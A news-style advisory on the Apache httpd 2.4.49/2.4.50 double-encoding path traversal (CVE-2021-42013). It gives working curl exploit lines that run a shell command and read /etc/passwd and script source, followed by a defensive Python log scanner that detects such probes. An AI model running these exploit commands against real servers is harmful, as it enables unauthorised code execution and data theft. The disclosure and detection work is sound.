A vulnerability in Apache httpd that allows access outside the site root directory

A new attack vector has been found for the Apache http server that was not fixed in the 2.4.50 update and allows files to be accessed from areas outside the site's root directory. In addition, researchers found a way that, in the presence of certain non-standard settings, allows not only reading system files but also executing code on the server. The problem appears only in releases 2.4.49 and 2.4.50; earlier versions are not affected. To eliminate the new vulnerability, Apache httpd 2.4.51 was released promptly.

In essence, the new problem (CVE-2021-42013) is similar to the original vulnerability (CVE-2021-41773) in 2.4.49; the only difference is a different encoding of the ".." characters. Specifically, release 2.4.50 blocked the use of the "%2e" sequence to encode a dot, but missed the possibility of double encoding: when the sequence "%%32%65" is specified, the server first decodes it into "%2e" and then into ".", i.e. the "../" characters used to move to the parent directory can be encoded as ".%%32%65/".

As for exploiting the vulnerability to execute code, this is possible when mod_cgi is enabled and a base path is used in which execution of CGI scripts is permitted (for example, if the ScriptAlias directive is enabled or the ExecCGI flag is specified in the Options directive). Another requirement for a successful attack is that access to directories containing executable files, such as /bin, or to the file system root "/", is explicitly granted in the Apache configuration. Since such access is not usually granted, code execution attacks have little applicability to real systems.

At the same time, the attack to obtain the contents of arbitrary system files and the source code of web scripts readable by the user under which the http server runs remains relevant. To carry out such an attack it is enough that the site has a directory configured using the "Alias" or "ScriptAlias" directive (DocumentRoot is not enough), such as "cgi-bin".

An example exploit that allows running the "id" utility on the server:

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)

An example exploit that allows displaying the contents of /etc/passwd and of one of the web scripts (to output the script's source code, a directory defined via the "Alias" directive, in which script execution is not enabled, must be specified as the base directory):

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
curl 'http://192.168.0.1/aliaseddir/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/usr/local/apache2/cgi-bin/test.cgi'

The problem mostly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as FreeBSD ports. Packages in the stable branches of the conservative server distributions Debian, RHEL, Ubuntu and SUSE are not affected. The problem does not occur if access to directories is explicitly denied using the "require all denied" setting.
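The double decoding described above (one pass turns "%%32%65" into "%2e", a second pass turns that into ".") is exactly what a defender has to reproduce to spot probes for this bug in access logs, since a filter that decodes only once stops at "%2e" and sees nothing. The following Python is an added example and not code from the article or from the Apache project; the log lines, IP addresses and paths are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [07/Oct/2021:10:00:01 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199
192.0.2.10 - - [07/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1234
192.0.2.11 - - [07/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 58
198.51.100.7 - - [07/Oct/2021:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
DOTDOT_SEGMENT = re.compile(r"(^|/)\.\.(/|$)")

def decode_fully(path: str, max_rounds: int = 5) -> tuple[str, int]:
    """Percent-decode until the string stops changing; return the result and
    the number of rounds that changed it (1 for "%2e", 2 for "%%32%65").
    A single unquote(), which is what a naive filter does, stops at "%2e"."""
    current, rounds = path, 0
    while rounds < max_rounds:
        nxt = unquote(current)
        if nxt == current:
            break
        current, rounds = nxt, rounds + 1
    return current, rounds

def is_traversal(path: str) -> bool:
    """True if the fully decoded path contains a '..' segment."""
    return DOTDOT_SEGMENT.search(decode_fully(path)[0]) is not None

def scan_log(text: str) -> list[dict]:
    """One record per request whose path traverses after full decoding."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or not is_traversal(m.group("path")):
            continue
        decoded, rounds = decode_fully(m.group("path"))
        hits.append({
            "ip": line.split(" ", 1)[0],
            "path": m.group("path"),
            "decoded": decoded,
            "decode_rounds": rounds,            # 2 = double encoding, the 2.4.50 bypass
            "status": int(m.group("status")),   # 200 on a traversal path means it got through
        })
    return hits
```

A hit with decode_rounds of 2 and status 200 on a 2.4.49 or 2.4.50 server is the pattern worth paging on; the same scan run before and after the upgrade to 2.4.51 also confirms the fix took effect.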

source: budenet.ru
